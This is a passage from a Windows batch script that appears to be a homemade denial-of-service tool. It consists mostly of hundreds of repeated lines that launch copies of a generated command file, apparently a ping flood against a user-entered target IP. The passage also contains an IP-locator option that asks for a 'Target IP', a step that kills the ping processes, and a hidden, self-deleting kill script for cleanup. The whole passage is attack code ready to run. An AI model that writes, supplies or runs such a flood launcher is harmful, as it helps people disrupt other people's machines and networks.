start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
timeout %Time%
del %IP2%.cmd
TASKKILL /IM PING.EXE -f
timeout 5
goto EndString
exit

:4
@echo off
cls
echo 		IP Locator tool
echo.
echo 		Enter Target IP:
echo.
set /p IPLocator= ">"
start https://whatismyipaddress.com/ip/%IPLocator%
exit

:5
exit


:false
exit

:EndString
echo TASKKILL /IM cmd.exe>killddos.cmd
attrib +h +s killddos.cmd
start killddos.cmd
timeout 5
del killddos.cmd
exit